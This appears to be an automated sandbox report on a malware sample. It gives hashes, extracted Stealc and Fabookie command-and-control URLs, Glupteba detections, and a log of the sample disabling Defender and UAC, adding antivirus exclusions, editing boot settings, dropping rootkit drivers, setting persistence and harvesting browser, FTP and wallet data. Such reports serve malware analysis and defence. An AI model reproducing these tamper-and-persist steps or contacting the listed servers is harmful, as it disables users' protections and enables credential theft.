Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
26/01/2024, 19:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231215-en
General
-
Target
file.exe
-
Size
23KB
-
MD5
13e50553cf74404e0667de093b05d4bb
-
SHA1
d2b4e780b13305b25cba7cd3b2259d94d84120a8
-
SHA256
8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5
-
SHA512
23f9cbf9e32dbe4f5238e10d9b41d47adb80815122d69c2717e35b1a166c0b45a4767bba52c8c793a2d73f8abe4d9abd0ac57e62b1490d4ef86b3ec639d2a18c
-
SSDEEP
384:2uBq0csxekW8SepChIaSpZAuIrl/6Hx4QZb7DFN24uNDZOEv+45GoGCJEF8ZpHbY:cS8oHhxNhuLOyrEFiR1tM
Malware Config
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Extracted
fabookie
http://app.alie3ksgaa.com/check/safe
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral1/memory/2512-371-0x00000000031F0000-0x000000000331E000-memory.dmp family_fabookie behavioral1/memory/2512-512-0x00000000031F0000-0x000000000331E000-memory.dmp family_fabookie -
Glupteba payload 16 IoCs
resource yara_rule behavioral1/memory/1536-211-0x0000000004C80000-0x000000000556B000-memory.dmp family_glupteba behavioral1/memory/1920-222-0x0000000004C40000-0x000000000552B000-memory.dmp family_glupteba behavioral1/memory/1536-225-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/1920-226-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/1536-258-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/1536-271-0x0000000004C80000-0x000000000556B000-memory.dmp family_glupteba behavioral1/memory/1920-272-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/1156-296-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/2848-298-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/1156-328-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/2848-335-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/2052-358-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/2052-438-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/2052-496-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/2052-558-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral1/memory/2052-590-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xO4GOimcBGQkXzhbomVS7wqE.exe = "0" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WNdNVmbTRKpEC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\cvDkMpEVJyabfeVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uxf8mXBfEKTRBQXR1KuWCnLl.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sdTGWCKIydsYsNrSARR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gNEkwGGiCnIU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\fgekRaJKKiJdEvwV = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DufnooWHNFUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IAvstfEYU = "0" reg.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 1236 bcdedit.exe 1980 bcdedit.exe 868 bcdedit.exe 2900 bcdedit.exe 656 bcdedit.exe 1916 bcdedit.exe 2108 bcdedit.exe 2980 bcdedit.exe 2072 bcdedit.exe 1480 bcdedit.exe 2620 bcdedit.exe 1952 bcdedit.exe 1960 bcdedit.exe 2516 bcdedit.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2768 netsh.exe 3024 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dqNWS8777gkfYL5K9uS81EQF.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jM8pO9IlBuEMnEN0E4grDFiu.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uFsNCwiQgGssR2Ms7vRuGSFj.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KNRQLCemsacJ5GocEApeDBOE.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oGe0JsKsDCqztP7M8hNuWgGo.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6sfur893dbdxSvCsuNRsXai.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\W5ZhmEfHl4CkzX8RxJw1gaF2.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mVM3Fx4BizIGsxw1LUu0FJRO.bat AddInProcess32.exe -
Executes dropped EXE 20 IoCs
pid Process 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 1536 uxf8mXBfEKTRBQXR1KuWCnLl.exe 1920 xO4GOimcBGQkXzhbomVS7wqE.exe 2476 BroomSetup.exe 2512 uSAXN67jO1NV6A1Dms0TQwUe.exe 2136 nso8C0C.tmp 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 1156 xO4GOimcBGQkXzhbomVS7wqE.exe 1752 4Obr3e4WwXT6zfKFALzQ6SNr.exe 2052 csrss.exe 2756 patch.exe 2944 injector.exe 2088 HWoskNzoWXP58nKa90DwL1zh.exe 1876 zP1vBkts9eMW4Mc2oRVOrTfC.exe 2372 Install.exe 1884 Install.exe 2856 dsefix.exe 2308 windefender.exe 1820 windefender.exe 1688 vPxFIBw.exe -
Loads dropped DLL 43 IoCs
pid Process 752 AddInProcess32.exe 752 AddInProcess32.exe 752 AddInProcess32.exe 752 AddInProcess32.exe 752 AddInProcess32.exe 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 752 AddInProcess32.exe 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 2044 qf2qmDJ9ve1MH2AQC1wZpqmY.exe 752 AddInProcess32.exe 752 AddInProcess32.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 2848 uxf8mXBfEKTRBQXR1KuWCnLl.exe 832 Process not Found 2756 patch.exe 2756 patch.exe 2756 patch.exe 2756 patch.exe 2756 patch.exe 2052 csrss.exe 752 AddInProcess32.exe 2088 HWoskNzoWXP58nKa90DwL1zh.exe 2088 HWoskNzoWXP58nKa90DwL1zh.exe 752 AddInProcess32.exe 1876 zP1vBkts9eMW4Mc2oRVOrTfC.exe 2136 nso8C0C.tmp 1876 zP1vBkts9eMW4Mc2oRVOrTfC.exe 1876 zP1vBkts9eMW4Mc2oRVOrTfC.exe 2136 nso8C0C.tmp 1876 zP1vBkts9eMW4Mc2oRVOrTfC.exe 2372 Install.exe 2372 Install.exe 2372 Install.exe 2372 Install.exe 1884 Install.exe 1884 Install.exe 1884 Install.exe 2756 patch.exe 2756 patch.exe 2756 patch.exe 2052 csrss.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000500000001a09e-423.dat upx behavioral1/files/0x000500000001a09e-426.dat upx behavioral1/files/0x000500000001a09e-425.dat upx behavioral1/memory/2088-437-0x00000000008E0000-0x0000000000DC8000-memory.dmp upx behavioral1/memory/2088-545-0x00000000008E0000-0x0000000000DC8000-memory.dmp upx behavioral1/memory/2308-589-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/1820-592-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2308-591-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xO4GOimcBGQkXzhbomVS7wqE.exe = "0" xO4GOimcBGQkXzhbomVS7wqE.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uxf8mXBfEKTRBQXR1KuWCnLl.exe = "0" uxf8mXBfEKTRBQXR1KuWCnLl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" file.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" uxf8mXBfEKTRBQXR1KuWCnLl.exe Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 11 pastebin.com 12 pastebin.com -
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vPxFIBw.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol vPxFIBw.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini vPxFIBw.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2760 set thread context of 752 2760 file.exe 31 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN xO4GOimcBGQkXzhbomVS7wqE.exe File opened (read-only) \??\VBoxMiniRdrDN uxf8mXBfEKTRBQXR1KuWCnLl.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\Logs\CBS\CbsPersist_20240126190528.cab schtasks.exe File opened for modification C:\Windows\rss uxf8mXBfEKTRBQXR1KuWCnLl.exe File created C:\Windows\rss\csrss.exe uxf8mXBfEKTRBQXR1KuWCnLl.exe File opened for modification C:\Windows\rss xO4GOimcBGQkXzhbomVS7wqE.exe File opened for modification C:\Windows\rss\csrss.exe xO4GOimcBGQkXzhbomVS7wqE.exe File created C:\Windows\Tasks\bmfUAJAHieefCXsdaD.job schtasks.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1556 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nso8C0C.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nso8C0C.tmp -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2104 schtasks.exe 3020 schtasks.exe 2332 schtasks.exe 2620 schtasks.exe 320 schtasks.exe 1192 schtasks.exe 1368 schtasks.exe 1748 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2024 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" xO4GOimcBGQkXzhbomVS7wqE.exe Set value (data) 